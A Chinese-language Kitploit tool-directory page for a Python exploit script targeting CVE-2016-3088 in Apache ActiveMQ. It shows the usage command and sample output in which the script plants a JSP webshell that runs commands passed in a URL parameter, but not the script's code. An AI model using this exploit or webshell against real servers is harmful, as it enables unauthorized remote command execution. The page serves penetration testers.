Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2016-3088 — 基于Python的CVE-2016-3088漏洞利用脚本 | Kitploit
工具/GitHubGitHub/hearte4t3r/cve-2016-3088
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制Payload 开发
GitHubhearte4t3r/cve-2016-3088

CVE-2016-3088

基于Python的CVE-2016-3088漏洞利用脚本

查看仓库
41年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2016-3088

Statement

一个基于Python的CVE-2016-3088利用脚本。
这是我的第一个脚本,所以可能有些地方不太合适。
但在我测试时它似乎运行正常。

Discription

该脚本可以在渗透CVE-2016-3088时省去抓包步骤,
从而让我们直接写入和移动文件。

Usage

python CVE-2016-3088.py --url http://ip:port/ [--path absolute_path] [--script filename.txt]

参数--script是可选的,如果不带该参数运行程序,它将使用内置的有效载荷,
该有效载荷仅允许您在URL中执行一些命令。
但您可以输入其他脚本以达到您的目的。

Installation

只需下载.py文件。
并且它需要一些模块。

Example

$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq

[+] The target is Vulnerable  
[+] Exploiting...  
[+] Successful!  
[+] Visit The JSP file: http://192.168.244.153:8161/admin/d404ca6ffa5849a9ab1202dd388684f5.jsp?pwd=023&i=[Your-Command]  
使用--script参数
$ python CVE-2016-3088.py --url http://192.168.244.153:8161/ --path /opt/activemq --script script.txt

[+] The target is Vulnerable  
[+] Exploiting...  
[+] Successful!  
[+] Visit The JSP file: http://192.168.244.153:8161/admin/6655d82d47cd43bb8a21515f476bce1f.jsp  

Disclaimer

请谨慎使用此工具,并仅在授权情况下使用!

下载工具